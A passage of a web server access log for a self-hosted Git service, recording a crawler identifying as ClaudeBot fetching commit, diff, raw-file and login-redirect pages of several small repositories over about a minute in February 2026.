2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 11759] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fobj%2FTestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 23520] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" [Client 216.73.216.188] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Frequirements.txt" [Client 216.73.216.188] [Length 19511] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 216721] [Gzip 13.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 26193] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Ftemplates" [Client 216.73.216.188] [Length 29261] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 216.73.216.188] [Length 11452] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.vscode%2Fsettings.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" [Client 216.73.216.188] [Length 9824] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 216.73.216.188] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 453262] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2Fclaude.md" [Client 216.73.216.188] [Length 28763] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fnginx%2Fproxy_host%2F1.conf" [Client 216.73.216.188] [Length 24005] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 11776] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 20105] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2FTestService.csproj" [Client 216.73.216.188] [Length 21829] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2FDockerfile" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2F.vscode%2Flaunch.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 216.73.216.188] [Length 11505] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Frequirements.txt" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 12553] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fmail_contact.py" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fnginx.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Ftemplates" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 398808] [Gzip 13.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 11122] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 398846] [Gzip 13.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 398526] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Ftemplates%2Ffavicon.ico" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 398475] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FOpcUaMinimal.csproj" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnginx.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 